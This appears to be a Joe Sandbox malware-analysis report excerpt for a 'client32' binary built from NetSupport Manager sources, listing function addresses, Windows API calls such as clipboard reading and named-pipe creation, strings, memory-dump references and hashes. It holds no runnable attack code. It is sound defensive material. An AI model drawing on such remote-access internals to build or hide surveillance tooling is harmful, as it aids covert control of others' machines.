                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsIconic.USER32(?), ref: 11123836
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
                                                                                                                                                    • IsIconic.USER32(?), ref: 111238C4
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Iconic$FreeInvalidateLibraryRect
                                                                                                                                                    • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                                                                                                    • API String ID: 2857465220-3401310001
                                                                                                                                                    • Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                                                                                    • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                                                                                                    • Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                                                                                    • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                                                                                                    Function 110CB750 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 110CB7D9
                                                                                                                                                    • IsIconic.USER32(00000001), ref: 110CB7E9
                                                                                                                                                    • GetClientRect.USER32(00000001,?), ref: 110CB7F8
                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 110CB80D
                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 110CB814
                                                                                                                                                    • IsIconic.USER32(00000001), ref: 110CB844
                                                                                                                                                    • GetWindowRect.USER32(00000001,?), ref: 110CB853
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB907
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                                                    • API String ID: 2655531791-1552842965
                                                                                                                                                    • Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                                                                                    • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                                                                                                    • Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                                                                                    • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                                                                                                    Function 110F37A0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
                                                                                                                                                    • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
                                                                                                                                                    • GetLastError.KERNEL32 ref: 110F3820
                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 110F383F
                                                                                                                                                    • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 110F386F
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • CreateNamedPipe %s failed, error %d, xrefs: 110F3828
                                                                                                                                                    • pSD, xrefs: 110F37C5
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                                                                                    • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                                                                                    • API String ID: 3134831419-838605531
                                                                                                                                                    • Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                                                                                    • Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
                                                                                                                                                    • Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                                                                                    • Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795
                                                                                                                                                    Function 110336D0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                                                                                    • API String ID: 0-293745777
                                                                                                                                                    • Opcode ID: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                                                                                    • Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
                                                                                                                                                    • Opcode Fuzzy Hash: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                                                                                    • Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91
                                                                                                                                                    Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                                                                                                    • FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                                                                                      • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
                                                                                                                                                      • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                                                                                      • Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
                                                                                                                                                      • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                                                                                      • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                                                                                      • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                                                                                      • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                                                                                      • Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
                                                                                                                                                      • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                                                                                      • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                                                                                    • String ID: NSMClassList$NSMFindClassEvent
                                                                                                                                                    • API String ID: 1622498684-2883797795
                                                                                                                                                    • Opcode ID: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                                                                                                    • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                                                                                                    • Opcode Fuzzy Hash: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                                                                                                    • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                                                                                                    Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                                                                                    • GetClipboardData.USER32(?), ref: 1103337D
                                                                                                                                                    • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                                                                                    • GetLastError.KERNEL32 ref: 11033406
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                                                                                    • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                                                                                    • API String ID: 1861668072-1296821031
                                                                                                                                                    • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                                                                                    • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                                                                                    • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                                                                                    • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                                                                                                    Function 11089430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                                                                                    • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLock
                                                                                                                                                    • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                                                                                    • API String ID: 2752051264-327499879
                                                                                                                                                    • Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                                                                                    • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
                                                                                                                                                    • Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                                                                                    • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                                                                                                    Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                                                                                    • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountIconicTick
                                                                                                                                                    • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                                                                                    • API String ID: 1307367305-2838568823
                                                                                                                                                    • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                                                                    • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                                                                                    • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                                                                    • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                                                                                    Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                                                                                                    • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                                                                                                    • BringWindowToTop.USER32(000000FF), ref: 110C10C7
